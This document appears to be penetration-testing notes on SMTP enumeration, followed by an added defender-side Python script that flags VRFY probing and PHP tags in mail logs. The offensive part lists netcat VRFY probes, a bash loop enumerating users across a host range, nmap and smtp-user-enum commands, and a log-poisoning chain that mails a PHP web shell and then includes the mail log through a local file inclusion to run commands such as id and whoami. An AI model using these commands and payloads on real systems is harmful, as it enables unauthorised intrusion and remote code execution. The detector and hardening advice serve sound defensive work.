SMTP Enum
- Check for version
- LFI chaining via log file poisoning
- User enumeration
nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5 [email protected] <--- Output if user exists
VRFY idontexist
550 5.1.1 idontexist... User unknown <--- Output if user does not exist
EXPN request: asks the server to expand a mailing list into its member addresses
#!/bin/bash
# VRFY Script
#############
# numbers.txt holds the last octet of each host to test (10.11.1.<octet>)
for ips in $(cat numbers.txt); do
  # users.txt holds one username per line
  for user in $(cat users.txt); do
    # a 250 reply means the server confirms the user exists
    echo "VRFY $user" | nc -nv -w 1 "10.11.1.$ips" 25 2>/dev/null | grep '^250'
  done
done
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1
smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10
smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10
telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:[email protected]
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>
.
=================================================
After this, request the LFI you have already discovered with the mail log as the included file and append the cmd variable:
?cmd=id
&cmd=id
Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
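A defender-side example, added here and not part of the original notes: it scans mail-log lines for the two activities above, a burst of failed VRFY lookups from one source and a PHP open tag written into the log through a poisoned Subject. The log layout and the regexes are assumptions; the sample lines are constructed, and the patterns must be adapted to the actual MTA's format.

```python
import re
from collections import Counter

# Constructed sample lines, not output of any real mail server; the layout
# (and therefore the patterns below) is an assumption to adapt to your MTA.
SAMPLE_MAIL_LOG = """\
Mar  3 10:01:02 mx mta[1201]: 10.11.1.5: VRFY bob -> 250 2.1.5
Mar  3 10:01:03 mx mta[1201]: 10.11.1.5: VRFY idontexist -> 550 5.1.1 User unknown
Mar  3 10:01:03 mx mta[1201]: 10.11.1.5: VRFY admin -> 550 5.1.1 User unknown
Mar  3 10:01:04 mx mta[1201]: 10.11.1.5: VRFY root -> 550 5.1.1 User unknown
Mar  3 10:05:00 mx mta[1202]: 10.11.1.9: VRFY carol -> 250 2.1.5
Mar  3 10:07:31 mx mta[1203]: 10.11.1.5: subject=<?php echo system($_REQUEST['cmd']); ?>
"""

# Source address, the VRFY argument and the three-digit reply code.
VRFY_RE = re.compile(r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3}): VRFY \S+ -> (?P<code>\d{3})")
# A PHP open tag has no business inside a mail log line.
PHP_TAG_RE = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)


def vrfy_probes(lines, min_unknown=3):
    """Map source IP -> number of 5xx VRFY replies, keeping only sources at or
    above min_unknown: legitimate clients rarely VRFY many unknown users."""
    unknown = Counter()
    for line in lines:
        m = VRFY_RE.search(line)
        if m and m.group("code").startswith("5"):
            unknown[m.group("ip")] += 1
    return {ip: n for ip, n in unknown.items() if n >= min_unknown}


def poisoned_lines(lines):
    """Return 1-based numbers of lines carrying a PHP open tag, i.e. a log
    entry that would execute if the file were ever included by PHP."""
    return [i for i, line in enumerate(lines, 1) if PHP_TAG_RE.search(line)]


if __name__ == "__main__":
    log = SAMPLE_MAIL_LOG.splitlines()
    print("VRFY probing sources:", vrfy_probes(log))
    print("poisoned log lines:", poisoned_lines(log))
```

Disabling VRFY/EXPN on the MTA and keeping log files out of any path the web application can include removes both signals at the source.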